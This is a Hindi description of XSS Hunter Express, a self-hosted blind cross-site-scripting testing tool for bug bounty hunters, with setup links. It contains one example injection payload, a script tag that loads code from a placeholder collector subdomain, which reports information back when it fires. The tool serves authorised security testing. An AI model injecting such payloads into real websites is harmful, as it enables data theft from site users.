
XSS Hunter सेवा - XSSHunter.com का एक पोर्टेबल संस्करण
अधिक जानकारी के लिए यहाँ देखें: https://github.com/mandatoryprogrammer/xsshunter-express
यह https://xsshunter.com पर चलने वाले स्रोत कोड का एक पोर्टेबल संस्करण है। इसे सुरक्षा पेशेवरों और बग बाउंटी हंटर्स के लिए किसी भी सर्वर पर आसानी से स्थापित करने के लिए डिज़ाइन किया गया है जो XSS का अधिक शक्तिशाली तरीके से परीक्षण करना चाहते हैं।
यदि आप इस सॉफ़्टवेयर को सेट अप नहीं करना चाहते हैं और बस परीक्षण शुरू करना चाहते हैं, तो https://xsshunter.com देखें।
कृपया अपने स्वयं के सर्वर पर XSS Hunter सेट अप करने की जानकारी के लिए https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ देखें।
साइन अप करने पर आप एक विशेष छोटा डोमेन जैसे yoursubdomain.xss.ht बनाएंगे जो आपकी XSS कमजोरियों को पहचानता है और आपके पेलोड को होस्ट करता है। फिर आप इस सबडोमेन का उपयोग अपने XSS परीक्षण में करते हैं, इंजेक्शन प्रयासों जैसे "><script src=//yoursubdomain.xss.ht></script> का उपयोग करके। XSS Hunter स्वचालित रूप से XSS प्रोब्स प्रस्तुत करेगा और जब वे फायर होते हैं तो परिणामी जानकारी एकत्र करेगा।
crossdomain.xml जैसी खराब नीतियों जैसी अन्य कमजोरियों को खोजने में उपयोगी है जो सामान्यतः एक्सेस नहीं किए जा सकते।/app पथ पर जाएँ और पृष्ठ को अपने iPhone के डेस्कटॉप पर एक वेब एप्लिकेशन के रूप में सहेजें।सभी कोड मेरे द्वारा बनाया गया था और (इस कारण से) संभवतः सर्वोत्तम अभ्यास नहीं है और निश्चित रूप से अनुकूलन/सफाई की आवश्यकता है। किसी भी पुल अनुरोध की सराहना की जाती है!